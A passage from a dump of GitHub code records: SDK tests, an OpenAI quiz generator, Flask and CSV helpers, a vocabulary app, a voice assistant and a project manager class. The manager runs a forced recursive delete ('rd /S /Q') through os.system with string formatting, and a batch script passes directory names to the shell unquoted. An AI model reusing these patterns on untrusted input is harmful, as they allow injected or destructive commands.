tenant.groups.get(random.choice(groups))\n assert type(group) is dict\n assert group.get(\"id\") in groups\n\n\n# users under user_management\n@pytest.mark.users\ndef test_get_users(tenant):\n users = [user.get(\"id\") for user in tenant.users.list()]\n user = tenant.users.get(random.choice(users))\n assert type(user) is dict\n assert user.get(\"id\") in users\n\n\n@pytest.mark.users\ndef test_create_users(tenant, test_user_data):\n data = tenant.users.create(test_user_data)\n assert data.status_code == 200\n assert \"pytest@tng-lab.org\" in data.json().get(\"email\")\n\n\n@pytest.mark.users\ndef test_update_users(tenant):\n user = next(\n (user for user in tenant.users.list() if user[\"email\"] == \"pytest@tng-lab.org\"),\n None,\n )\n\n update_data = user\n\n update_data[\"name\"] = f\"{user.get('name')} Update\"\n\n result = tenant.users.update(user.get(\"id\"), update_data)\n\n assert result.status_code == 200\n assert \"Update\" in result.json().get(\"name\")\n\n\n@pytest.mark.users\ndef test_list_users(tenant):\n data = tenant.users.list()\n assert type(data) is list\n assert len(data) > 0\n\n\n@pytest.mark.users\ndef test_delete_users(tenant):\n user = next(\n (user for user in tenant.users.list() if user[\"email\"] == \"pytest@tng-lab.org\"),\n None,\n )\n\n result = tenant.users.delete(user.get(\"id\"))\n\n assert result.status_code == 204\n\n\n@pytest.mark.users\ndef test_bulk_delete_users(tenant): # TODO\n pass\n\n\n# auditors under user_management\n@pytest.mark.auditors\ndef test_list_auditors(tenant):\n result = tenant.auditors.list()\n assert type(result) is list\n\n\ndef test_activate(tenant):\n tenant.activate_changes()\n","repo_name":"SYNically-ACKward/zsdk","sub_path":"tests/zia/test_user_management.py","file_name":"test_user_management.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29859198351","text":"import openai\nimport random\n\n\ndef Get_Question(arr):\n reference = random.randint(1, len(arr)-2)\n package = {\"reference\": reference, \"question\": ''}\n paragraph = arr[reference]\n question_type = random.randint(1, 
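The test module above leans on a module-scoped `tenant` fixture plus a list-then-random-get pattern. A self-contained sketch of the same shape that runs without a Zscaler tenant; `FakeDepartments` and its five rows are invented stand-ins:

```python
# Sketch of the list -> random get -> assert pattern, against a fake
# in-memory client so it runs anywhere under pytest.
import random
from types import SimpleNamespace
import pytest

class FakeDepartments:
    def list(self):
        return [{"id": i, "name": f"dept-{i}"} for i in range(5)]

    def get(self, dept_id):
        return next(d for d in self.list() if d["id"] == dept_id)

@pytest.fixture(scope="module")     # built once per module, like `tenant` above
def tenant():
    return SimpleNamespace(departments=FakeDepartments())

def test_get(tenant):
    ids = [d["id"] for d in tenant.departments.list()]
    dept = tenant.departments.get(random.choice(ids))
    assert isinstance(dept, dict) and dept["id"] in ids
```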
2)\n\n if question_type == 1:\n package[\"question\"] = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f\"You have taught the user {paragraph}. Now ask them a challenging hard multiple choice question that has only one \"\n f\"correct option without giving them the answer\",\n temperature=0.5,\n max_tokens=300,\n frequency_penalty=0.2,\n presence_penalty=0.0\n )[\"choices\"][0][\"text\"].strip()\n\n else:\n package[\"question\"] = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f\"You have taught the user {paragraph}. Now ask them a challenging hard True or False question without giving them \"\n f\"the answer\",\n temperature=0.5,\n max_tokens=300,\n frequency_penalty=0.2,\n presence_penalty=0.0\n )[\"choices\"][0][\"text\"].strip()\n\n question = package[\"question\"]\n package[\"answer\"] = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f\"Give answer to the following question and explain your solution with detail {question}\",\n temperature=0.25,\n max_tokens=400,\n frequency_penalty=0.0,\n presence_penalty=0.0\n )[\"choices\"][0][\"text\"].strip()\n\n return package\n","repo_name":"Adibvafa/MyCademy","sub_path":"website/Get_Question.py","file_name":"Get_Question.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"72013136893","text":"# -*- coding: utf-8 -*-\n# @Author : jjxu\n# @time: 2019/1/17 10:52\n\nfrom flask import request\nfrom flask_wtf import FlaskForm\nfrom app.libs.error_code import ParameterError\n\n\nclass BaseForm(FlaskForm):\n def __init__(self):\n super(BaseForm, self).__init__(data=request.json)\n\n def validate_for_api(self):\n valid = super(BaseForm, self).validate_on_submit()\n if not valid:\n raise ParameterError(self.errors)\n\n return self\n\n\n\n","repo_name":"xu20065953/FishBook_api","sub_path":"app/validators/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15403353618","text":"from collections import defaultdict\n\nimport pandas as pd\n\nfrom ..rules.part import PART_LABELS\nfrom . import writer_utils as w_utils\n\nPARTS_SET = set(PART_LABELS + [\"multiple_parts\"])\n\n\nclass BaseCsvWriter:\n first = []\n\n def __init__(self, csv_file, csv_min=0):\n self.csv_file = csv_file\n self.csv_min = csv_min\n self.csv_rows = []\n\n def write(self, rows):\n csv_rows = self.format_all_rows(rows)\n df = pd.DataFrame(csv_rows)\n df = self.sort_df(df)\n\n with open(self.csv_file, \"w\") as out_file:\n out_file.write(\"** All sizes are given in centimeters. 
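The `BaseForm` above binds `request.json` into a Flask-WTF form and turns validation failures into a single `ParameterError`. A sketch of how a concrete form would plug into it; the field names are illustrative, and a pure-JSON API would typically also disable CSRF (for example via `class Meta: csrf = False` on the form):

```python
from wtforms import StringField
from wtforms.validators import DataRequired, Length

class ClientForm(BaseForm):           # BaseForm as defined above
    account = StringField(validators=[DataRequired(), Length(min=5, max=32)])
    secret = StringField(validators=[DataRequired()])

# In a view, inside a request context with a JSON body:
#     form = ClientForm().validate_for_api()  # raises ParameterError on bad input
#     account = form.account.data
```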
**\\n\")\n df.to_csv(out_file, index=False)\n\n def format_all_rows(self, rows):\n csv_rows = [self.format_row(r) for r in rows]\n return csv_rows\n\n def format_row(self, row):\n raise NotImplementedError\n\n def row_builder(self, row, csv_row):\n by_header = defaultdict(list)\n for trait in row.traits:\n if trait[\"trait\"] in PARTS_SET:\n continue\n\n key_set = set(trait.keys())\n\n if not (PARTS_SET & key_set):\n continue\n\n base_header = w_utils.html_label(trait)\n\n self.group_values_by_header(by_header, trait, base_header)\n self.number_columns(by_header, csv_row)\n return csv_row\n\n def sort_df(self, df):\n rest = [\n c\n for c in df.columns\n if c not in self.first and df[c].notna().sum() >= self.csv_min\n ]\n\n columns = self.first + sorted(rest)\n df = df[columns]\n return df\n\n @staticmethod\n def group_values_by_header(by_header, trait, base_header):\n filtered = {k: v for k, v in trait.items() if k not in w_utils.COLUMN_SKIPS}\n by_header[base_header].append(filtered)\n\n @staticmethod\n def number_columns(by_header, csv_row):\n for unnumbered_header, trait_list in by_header.items():\n for i, trait in enumerate(trait_list, 1):\n for key, value in trait.items():\n header = f\"{unnumbered_header}.{i}.{key}\"\n csv_row[header] = value\n","repo_name":"rafelafrance/FloraTraiter","sub_path":"flora/pylib/writers/base_csv_writer.py","file_name":"base_csv_writer.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72397856893","text":"import os\r\nimport subprocess\r\nfrom subprocess import PIPE\r\n\r\ndank = next(os.walk('.'))[1]\r\n\r\nfor d in dank:\r\n dd = next(os.walk(d))\r\n sd = dd[0]\r\n od = dd[2]\r\n for zd in od:\r\n p = subprocess.Popen(['git','cat-file','-p',str(sd+zd)],stdin=PIPE,stdout=PIPE,stderr=PIPE)\r\n output, err = p.communicate()\r\n try:\r\n open(\"done/\"+str(sd+zd),\"w\").write(str(output.decode('utf-8')))\r\n print(sd+zd)\r\n except UnicodeDecodeError:\r\n print(\"Failed to decode\")\r\n","repo_name":"coffee2142/gitfile-enumerator","sub_path":"enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74778455611","text":"#!/usr/bin/python3\n\nimport os\nimport sys\n\n\n#\n# Main function\n#\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 1:\n print('Usage: ExtractMeasures.py ')\n sys.exit()\n\n os.system('ls > directories.txt')\n file1 = open('directories.txt','r')\n dirname = file1.readline()\n while (dirname):\n dirname = dirname.split('\\n')[0]\n if ((dirname != 'PanicleMeasures.csv') and\n (dirname != 'ExtraPanicleMeasures.csv') and\n (dirname != 'directories.txt') and \n (dirname != 'filenames.txt')):\n command = 'ls ' + dirname + '/originals/*.jpg' + ' > filenames.txt'\n os.system(command)\n file2 = open('filenames.txt','r')\n filename = file2.readline()\n while (filename):\n filename = filename.split('/')[-1]\n filename = filename.split('\\n')[0]\n command = 'iftPanicleMeasures ' + './' + dirname + ' ' + filename\n print(command)\n os.system(command)\n filename = file2.readline()\n file2.close()\n dirname = file1.readline() \n file1.close()\n os.system('rm directories.txt filenames.txt') \n 
sys.exit()\n","repo_name":"jdetras/PANorama3.0","sub_path":"python/ExtractMeasures.py","file_name":"ExtractMeasures.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40539044424","text":"import csv\nimport openai\nimport os\nimport random\nfrom datetime import datetime, timedelta\n\nfile_path = \"A1Wortlist.csv\"\n\n\ndef recreate_wortlist():\n input_file = \"A1Wortlist-backup.csv\"\n output_file = \"A1Wortlist.csv\"\n\n # Read the file and process each line\n with open(input_file, 'r') as file:\n lines = file.readlines()\n\n processed_lines = []\n\n for index, line in enumerate(lines, start=1):\n stripped_line = line.rstrip() # Remove trailing spaces\n if index == 1:\n modified_line = \"Wort, reviewFrequency, reviewDate\"\n else:\n modified_line = stripped_line + ',,' # Add two commas to the end\n processed_lines.append(modified_line + '\\n') # Add newline character\n\n # Write the processed lines back to the same file\n with open(output_file, 'w') as file:\n file.writelines(processed_lines)\n\n print(\"File processing complete.\")\n\n\ndef get_completion_from_messages(messages, model=\"gpt-3.5-turbo\", temperature=0.0, max_tokens=500):\n openai.api_key = os.getenv('OPENAI_API_KEY')\n # print(\"Get completion message: \", messages)\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n max_tokens=max_tokens,\n )\n return response.choices[0].message[\"content\"]\n\n\ndef chooseSelectedWords():\n # Go through the file\n # Add 10 words with today's date or earlier to selected words as array: [word, line number in wortLines]\n # Also in the case that 10 words are not found, keep an array of [word,line number] that do not have reviewData\n # Then check for the number of not found words,\n # and choose that number from the array in random and add to the selected words array\n wortLines = []\n selected_words_lineNumber = []\n not_reviewed_words = []\n number_burned = 0\n with open(file_path, 'r') as file:\n # num_lines = sum(1 for line in file)\n # print(f\"num_lines: {num_lines}\")\n for lineNumber, line in enumerate(file, start=0):\n line = line.strip()\n lineElements = line.split(',')\n wortLines.append(line.split(','))\n if lineNumber >= 1:\n\n word = lineElements[0]\n reviewFrequency = lineElements[1]\n reviewDateString = lineElements[2]\n\n if reviewDateString == \"\":\n not_reviewed_words.append([word, lineNumber])\n elif reviewFrequency != \"B\":\n reviewDateObject = datetime.strptime(reviewDateString, \"%Y-%m-%d\").date()\n today = datetime.now().date()\n if reviewDateObject <= today and len(selected_words_lineNumber) < 10:\n selected_words_lineNumber.append([word, lineNumber])\n elif reviewFrequency == \"B\":\n number_burned = number_burned + 1\n\n print(\"Number of selected words using reviewDate:\", len(selected_words_lineNumber))\n\n # Check if selected_words has 10 orders or add random words to it\n num_selected_words = len(selected_words_lineNumber)\n if num_selected_words < 10:\n num_missing = 10 - num_selected_words\n if num_missing <= len(not_reviewed_words):\n random_word_indices = random.sample(range(0, len(not_reviewed_words)), num_missing)\n else:\n random_word_indices = random.sample(range(0, len(not_reviewed_words)), len(not_reviewed_words))\n for random_index in random_word_indices:\n selected_words_lineNumber.append(not_reviewed_words[random_index])\n\n print(\"Number of selected words after adding random:\", 
len(selected_words_lineNumber))\n\n # Create a list of selected words\n selected_words = []\n for selected_word_lineNumber in selected_words_lineNumber:\n selected_words.append(selected_word_lineNumber[0])\n\n\n percentage_burned = number_burned / (len(wortLines) - 1)\n\n return wortLines, selected_words_lineNumber, selected_words, percentage_burned\n\n\ndef create_story(selected_words, temperature=0.0):\n # Prompt to create German Story\n # print(\"German Story temperature: \", temperature)\n messages = [\n {'role': 'system',\n 'content': \"\"\"\n You are a German teacher. \n \"\"\"\n },\n {'role': 'user',\n 'content': f\"\"\"\n Write a story in German with maximum 3 sentences.\n Only use words that are from the Goethe-Zertifikat A1 vocabulary list. \n Make sure these words are in the story: {\",\".join(selected_words)}\n \"\"\"\n },\n ]\n\n # Print story in German\n response = get_completion_from_messages(messages, temperature=temperature)\n print(\"German Story:\")\n print(response)\n input()\n\n messages.append(\n {'role': 'assistant',\n 'content': response\n }\n )\n\n return messages\n\n\n\ndef translate_to_English(messages):\n messages.append(\n {'role': 'user',\n 'content': 'Translate this German Story to English.'\n }\n )\n\n # Print story in English\n response = get_completion_from_messages(messages)\n print(\"English translation:\")\n print(response)\n input()\n\ndef anki(selected_words_lineNumber, wortLines):\n print(\"Anki:\")\n for wort_number, selected_word_lineNumber in enumerate(selected_words_lineNumber, start=1):\n wort = selected_word_lineNumber[0]\n lineNumber = selected_word_lineNumber[1]\n print(f\"{wort_number}. {wort}\")\n user_input = input(\"\")\n # Get the English translation using OpenAI\n messages = [\n {'role': 'system',\n 'content': \"\"\"\n You are a German teacher. 
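The selection rule above fills a ten-word review queue from words whose review date is due, then tops up with randomly sampled never-reviewed words. A compact sketch of that fill logic; the word tuples are invented examples:

```python
# Fill a review queue: due words first, then random never-reviewed words
# until the target size (or the pool) is exhausted.
import random

def build_queue(due, unreviewed, target=10):
    queue = due[:target]
    missing = target - len(queue)
    if missing > 0:
        queue += random.sample(unreviewed, min(missing, len(unreviewed)))
    return queue

due = [('Haus', 3), ('Katze', 7)]                 # (word, line_number) pairs
unreviewed = [('Zug', 12), ('Apfel', 19), ('Brot', 25)]
print(build_queue(due, unreviewed, target=4))
```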
\n \"\"\"\n },\n {'role': 'user',\n 'content': \"One Word English translation for: Klima\"\n },\n {'role': 'assistant',\n 'content': \"Climate\"\n },\n {'role': 'user',\n 'content': f\"One Word English translation for: {wort}\"\n },\n ]\n response = get_completion_from_messages(messages, temperature=0)\n user_input = input(response + \"\\n\")\n # Request for next Frequency\n currentFrequency = wortLines[lineNumber][1]\n freq_input = \"\"\n if currentFrequency == \"\":\n freq_input = input(\"Review again Tomorrow (T) or in 1 Week (W): \")\n elif currentFrequency == \"T\":\n freq_input = input(\"Review again Tomorrow (T) or in 1 Week (W): \")\n elif currentFrequency == \"W\":\n freq_input = input(\"Review again Tomorrow (T) or in 1 Month (M): \")\n elif currentFrequency == \"M\":\n freq_input = input(\"Review again Tomorrow (T) or in 3 Months (3M): \")\n elif currentFrequency == \"3M\":\n freq_input = input(\"Review again Tomorrow (T) or is it Burned in memory (B): \")\n elif currentFrequency == \"B\":\n freq_input = \"B\"\n print(\"This word is Burned in memory\\n\")\n\n # Based on next Frequency update the review date\n today = datetime.now().date()\n nextReviewDate = \"\"\n if freq_input == \"\":\n freq_input = \"T\"\n if freq_input == \"T\":\n nextReviewDate = today + timedelta(days=1)\n elif freq_input == \"W\":\n nextReviewDate = today + timedelta(days=7)\n elif freq_input == \"M\":\n nextReviewDate = today + timedelta(days=30)\n elif freq_input == \"3M\":\n nextReviewDate = today + timedelta(days=90)\n elif freq_input == \"B\":\n nextReviewDate = today\n\n # print(f\"{wort} line number: {lineNumber}\\n\")\n wortLines[lineNumber][1] = freq_input\n wortLines[lineNumber][2] = nextReviewDate.strftime(\"%Y-%m-%d\")\n\n print('\\n')\n\n\ndef save_to_csv(wortLines):\n # Write data to CSV file\n with open(file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n for row in wortLines:\n csv_writer.writerow(row)\n\n\n#recreate_wortlist()\nwortLines, selected_words_lineNumber, selected_words, percentage_burned = chooseSelectedWords()\nmessages = create_story(selected_words, temperature=percentage_burned)\nprint(f\"Percentage of words burned: {percentage_burned} \\n\")\nanki(selected_words_lineNumber, wortLines)\ntranslate_to_English(messages)\nsave_to_csv(wortLines)\n","repo_name":"raazgupta/GermanFriend","sub_path":"Story.py","file_name":"Story.py","file_ext":"py","file_size_in_byte":8355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10888955200","text":"from globals import *\nimport speech_recognition as sr\nimport datetime\nimport sys\nfrom sys import platform\nimport os\nimport subprocess\nfrom applemusic import AppleMusic\nimport randfacts\nimport pyautogui\nimport psutil\nfrom PyDictionary import PyDictionary\n\ndef speak(audio):\n \"\"\"\n Enables the virtual assistant to speak based on the required input.\n\n audio: text to be spoken\n \"\"\"\n print(\"Karen: {}\".format(audio))\n engine.say(audio)\n engine.runAndWait()\n\ndef GreetMe(name):\n \"\"\"\n This function ensures that the virtual assistant greets the user by \n their name.\n\n name: name of the user\n \"\"\"\n hour = int(datetime.datetime.now().hour)\n\n if hour >= 0 and hour < 12:\n speak(\"Good morning {}.\".format(name))\n time = 'this morning'\n elif hour >= 12 and hour < 18:\n speak(\"Good afternoon {}.\".format(name))\n time = 'today'\n else:\n speak(\"Good evening {}.\".format(name))\n time = 'tonight'\n \n speak(\"You can call me 
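The `anki` review loop above encodes its interval ladder (tomorrow, week, month, three months, burned) as an if/elif chain; the same ladder reads more directly as data. A sketch, where `NEXT_STEP` captures the "harder" option offered at each stage:

```python
# The review ladder as lookup tables instead of if/elif chains.
from datetime import date, timedelta

INTERVALS = {'T': 1, 'W': 7, 'M': 30, '3M': 90, 'B': 0}   # days until review
NEXT_STEP = {'': 'W', 'T': 'W', 'W': 'M', 'M': '3M', '3M': 'B'}

def next_review(freq_input, today=None):
    today = today or date.today()
    return today + timedelta(days=INTERVALS[freq_input])

print(next_review('W'))   # one week out
print(NEXT_STEP['M'])     # the harder option offered after a month: 3M
```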
Karen. What would you like me to do for you {}?\".format(time))\n\ndef MyCommand():\n \"\"\"\n Listens to the voice of the user to determine the command that the virtual \n assistant must respond and the task it should accomplish.\n \"\"\"\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening.\")\n r.pause_threshold = 1\n audio = r.listen(source) \n\n try:\n speak(\"Processing.\")\n query = r.recognize_google(audio, language='en-us')\n print(\"User: {}\\n\".format(query))\n\n except sr.UnknownValueError:\n speak(\"Could you say that again?\")\n return MyCommand()\n\n return query\n\ndef sendemail():\n \"\"\"\n Virtual assistant sends an email to a specified recipent.\n \"\"\"\n speak(\"Who should I send it to?\")\n recipient = MyCommand().lower()\n\n try:\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.login('email', 'password')\n speak(\"What would you like me to say?\")\n content = MyCommand()\n server.sendmail('email', recipient, content)\n server.close()\n speak(\"Email sent.\")\n except:\n speak(\"Sorry, {}. I couldn't send your email.\".format(name))\n\ndef playsong():\n \"\"\"\n Virtual assistant plays a specified song from apple music.\n \"\"\"\n speak(\"What song would you like me to play?\")\n song = MyCommand()\n\n try:\n AM = AppleMusic()\n AM.setupMethod()\n AM.setupVariables()\n AM.initiateWindow()\n AM.login('email', 'password')\n AM.playSong(song)\n except:\n speak(\"Sorry, {}. I couldn't play the song you requested.\".format(name))\n\ndef screenshot():\n \"\"\"\n Virtual assistant takes a screenshot and then saves it.\n \"\"\"\n sc = pyautogui.screenshot()\n sc.save('my_screenshot.png')\n speak(\"Screenshot saved.\")\n\ndef google(command):\n \"\"\"\n Open a tab based on the specified google search term.\n\n command: command specified by the user\n \"\"\"\n term = command.replace('google', '').strip()\n url = \"https://www.google.com/search?q={}\".format(term)\n return url\n\ndef youtube(command):\n \"\"\"\n Open a tab based on the specified youtube search term.\n\n command: command specified by the user\n \"\"\"\n term = command.replace('youtube', '').strip()\n url = \"https://www.youtube.com/results?q={}\".format(term)\n return url\n\ndef reminder():\n \"\"\"\n Saves a reminder to a text file.\n \"\"\"\n speak(\"What would you like me to remind you?\")\n reminder = MyCommand()\n\n try:\n r = open('reminders.txt', 'w')\n r.write(reminder)\n r.close()\n speak(\"Reminder saved.\")\n except:\n speak(\"Sorry, {}. 
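The `google`/`youtube` builders above interpolate the raw spoken phrase into the query string; percent-encoding keeps multi-word or punctuated queries valid. A sketch using `urllib.parse.quote_plus` (a suggested hardening, not what the source does):

```python
# Percent-encode the spoken search phrase before building the URL.
from urllib.parse import quote_plus

def google_url(command: str) -> str:
    term = command.replace('google', '').strip()
    return "https://www.google.com/search?q={}".format(quote_plus(term))

print(google_url("google patch match inpainting"))
# https://www.google.com/search?q=patch+match+inpainting
```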
I couldn't set a reminder.\".format(name))\n\ndef secs2hours(secs):\n \"\"\"\n Converts time in seconds to hours, minutes, and seconds\n\n secs: time in seconds\n \"\"\"\n mm, ss = divmod(secs, 60)\n hh, mm = divmod(mm, 60)\n return \"{} hours, {} minutes, and {} seconds\".format(hh, mm, ss)\n\ndef dictionary():\n \"\"\"\n Gets the meaning of a word specific by the user.\n \"\"\"\n speak(\"What word would you like to know the meaning of?\")\n word = MyCommand().lower()\n\n try:\n dict = PyDictionary()\n meaning = dict.meaning(word) \n speak(meaning)\n except:\n speak(\"I couldn't quite get that, could you repeat the word?\")\n dictionary()\n\n# Code below this line is incomplete\n\ndef findphone():\n \"\"\"\n Find location of user's phone using iCloud\n \"\"\"\n return None\n\ndef weather():\n \"\"\"\n Provides information about the weather in a specified city.\n \"\"\"\n return None\n\ndef news():\n \"\"\"\n Provides the user with trending headlines.\n \"\"\"\n return None\n\ndef recaudio():\n \"\"\"\n Records audio until user manually stops the recording.\n \"\"\"\n return None\n\ndef recvideo():\n \"\"\"\n Records screen until user manually stops the recording.\n \"\"\"\n return None\n ","repo_name":"saifjamsheer/karen-virtual-assistant","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72733908733","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\nimport traceback\nfrom com.boyaa.RainbowCenter.common import constant\nfrom com.boyaa.RainbowCenter.common import utils\nfrom com.boyaa.RainbowCenter.common.cfg_helper import InitHelper\nfrom com.boyaa.RainbowCenter.common.excel_helper import ReadExcelHelper\nfrom com.boyaa.RainbowCenter.common.exception import error_constant\nfrom com.boyaa.RainbowCenter.common.exception.exception import RainbowCenterException\nfrom com.boyaa.RainbowCenter.manager.base import BaseManager\nfrom com.boyaa.RainbowCenter.manager.testcase_manager import TestCaseManager\n\nclass ProjectManager(BaseManager):\n\n __cfg_helper = InitHelper(constant.cfg_file_path)\n __testcast_manager = TestCaseManager()\n\n def __init__(self):\n BaseManager.__init__(self)\n self.cfg_helper = self.__cfg_helper\n self.testcase_manager = self.__testcast_manager\n\n def get_projects(self, condition=None):\n projects = []\n try:\n params = []\n sql = \"\"\"\n select pj.*, pd.name product_name, u.name creator\n from project pj\n left join product pd on pd.id = pj.product_id\n left join user u on u.id = pj.creator_id\n where 1 = 1 \"\"\"\n dics = {\n 'pd.id': (condition and 'product_id' in condition) and condition['product_id'] or None,\n 'pj.name': (condition and 'project_name' in condition and condition['project_name']) and '%' +\n condition[\n 'project_name'] + '%' or None,\n 'u.name': (condition and 'creator' in condition and condition['creator']) and '%' + condition[\n 'creator'] + '%' or None,\n 'cur_page': (condition and 'cur_page' in condition) and condition['cur_page'] or None\n }\n print(dics)\n sql, params = self.db.assemble_sql(sql, params, dics, 'and')\n result = self.db.query(sql, params)\n for project in result:\n project['create_date'] = str(project['create_date'])\n project['update_date'] = str(project['update_date'])\n projects.append(project)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return projects\n\n def count_project(self, condition=None):\n row_count = 0\n try:\n 
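A quick worked check of the `divmod` chain in `secs2hours` above, since the two-step split is easy to misread:

```python
# divmod(secs, 60) yields (total minutes, leftover seconds);
# divmod(minutes, 60) then yields (hours, leftover minutes).
def secs2hours(secs):
    mm, ss = divmod(secs, 60)
    hh, mm = divmod(mm, 60)
    return "{} hours, {} minutes, and {} seconds".format(hh, mm, ss)

print(secs2hours(7384))   # 7384 = 2*3600 + 3*60 + 4 -> 2 hours, 3 minutes, and 4 seconds
```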
params = []\n sql = \"\"\"\n select *\n from project pj\n left join product pd on pd.id = pj.product_id\n left join user u on u.id = pj.creator_id\n where 1 = 1\n \"\"\"\n dics = {\n 'pd.id': (condition and 'product_id' in condition) and condition['product_id'] or None,\n 'pj.name': (condition and 'project_name' in condition and condition['project_name']) and '%' +\n condition[\n 'project_name'] + '%' or None\n }\n sql, params = self.db.assemble_sql(sql, params, dics, 'and')\n row_count = self.db.row_count(sql, params)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return row_count\n\n def add(self, infos):\n project_id = None\n try:\n project_name = infos['project_name']\n project_desc = infos['project_desc']\n product_id = utils.str_to_int(infos['product_id'])\n creator_id = infos['creator_id']\n svn_url = infos['svn_url']\n path = ''\n data_org = infos['data_org']\n sql = \"\"\"\n insert into project (`product_id`,`name`, `creator_id`, `path`, `data_org`, `svn_url`, `create_date`, `update_date`, `desc`)\n values (%s, %s, %s, %s, %s, %s, now(), now(), %s)\n \"\"\"\n params = [product_id, project_name, creator_id, path, data_org, svn_url, project_desc]\n project_id = self.db.execute(sql, params)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_create_failed\n error_msg = error_constant.errors[error_code]\n raise RainbowCenterException(error_msg, error_code)\n return project_id\n\n def creat_project(self, infos):\n success = False\n # try:\n # project_id = self.add(infos)\n\n def get_projects_by_id(self, ids):\n result = []\n try:\n sql = 'select * from product where id in ('\n\n tmp = '%s,' * len(ids)\n sql += tmp[:-1]\n sql += ')'\n\n result = self.db.query(sql, ids)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return result\n\n def check_project_name_exist(self, project_id, project_name):\n exist = False\n try:\n sql = \"select * from project where name = %s\"\n param = []\n param.append(project_name)\n if project_id:\n sql += ' and product_id = %s '\n param.append(project_id)\n count = self.db.row_count(sql, param)\n if count:\n exist = True\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return exist\n\n def create_project(self, infos):\n success = False\n try:\n project_id = self.add(infos)\n version_datas = []\n svn_url = infos['svn_url']\n path_list = utils.get_path_list_from_svn(svn_url)\n for path in path_list:\n version_data = [] # project_id, path, revision\n version_data.append(project_id)\n if path == 'trunk':\n version_data.append('trunk')\n path = svn_url + '/' + path\n revision = utils.get_revision_from_svn(path)\n version_data.append(revision)\n version_datas.append(version_data)\n elif path == 'branches':\n path = svn_url + '/' + path\n branch_path_list = utils.get_path_list_from_svn(path)\n for branch_path in branch_path_list:\n version_data.append('branches/' + branch_path)\n branch_path = path + '/' + branch_path\n revision = utils.get_revision_from_svn(path)\n version_data.append(revision)\n version_datas.append(version_data)\n sql = 'insert into project_svn_version (project_id, svn_path, version) values(%s, %s, %s)'\n self.db.execute_many(sql, version_datas)\n # create path\n path = os.sep.join([constant.test_project, str(infos['product_id']), str(project_id)])\n if os.path.exists(path):\n os.system('rd /S /Q %s' % path)\n os.makedirs(path, exist_ok=True)\n path = path.replace(os.sep, \"/\")\n sql = 
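`get_projects_by_id` above builds an SQL `IN` clause by repeating `%s` once per id and passing the values separately to the driver. A standalone sketch of that placeholder construction (using `str.join` rather than the original's trailing-comma trim):

```python
# One %s placeholder per id; values travel separately so the driver escapes them.
def in_clause_sql(ids):
    placeholders = ','.join(['%s'] * len(ids))
    sql = 'select * from product where id in ({})'.format(placeholders)
    return sql, list(ids)

sql, params = in_clause_sql([3, 7, 11])
print(sql)     # select * from product where id in (%s,%s,%s)
print(params)  # [3, 7, 11]
```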
'update project set path = %s where id = %s'\n self.db.execute(sql, [path, project_id])\n # checkout project from svn\n code_path = os.sep.join([path, 'code'])\n utils.checkout(infos['svn_url'], code_path)\n\n project = self.get_project(project_id)\n\n self.scan_ui_repository(project)\n # scan case\n if infos['scan_case']: # 0: not scan; 1: scan\n # scan cases\n project['scan_case'] = infos['scan_case']\n self.testcase_manager.scan_cases(project)\n success = True\n except RainbowCenterException as ex:\n raise ex\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_create_failed\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n return success\n\n def get_project(self, project_id):\n project = None\n try:\n sql = \"\"\"\n select pj.*, pd.name product_name, u.name creator\n from project pj\n left join product pd on pd.id = pj.product_id\n left join user u on u.id = pj.creator_id\n where pj.id = %s\n \"\"\"\n projects = self.db.query(sql, [project_id])\n if projects:\n project = projects[0]\n project['create_date'] = str(project['create_date'])\n project['update_date'] = str(project['update_date'])\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return project\n\n def __get_pages(self, project_id):\n sql = 'select * from `page` where project_id = %s'\n pages = self.db.query(sql, [project_id])\n return pages\n\n def scan_ui_repository(self, project):\n ui_repository_path = None\n try:\n # get project_id\n project_id = project['id']\n\n # delete ui_repository\n pages = self.__get_pages(project['id'])\n page_ids = []\n for page in pages:\n data = (page['id'],)\n page_ids.append(data)\n del_ui_sql = \"delete from ui_repository where page_id = %s \"\n self.db.execute_many(del_ui_sql, page_ids)\n\n del_page_sql = 'delete from page where project_id = %s '\n self.db.execute(del_page_sql, (project_id,))\n\n # get path\n share_folder = self.cfg_helper.get_value(\"share\", \"share_folder\", \"\")\n ui_repository_path = os.sep.join([share_folder, project['data_org'], 'UIRepository.xls'])\n\n # get datas\n if os.path.exists(ui_repository_path):\n excel_helper = 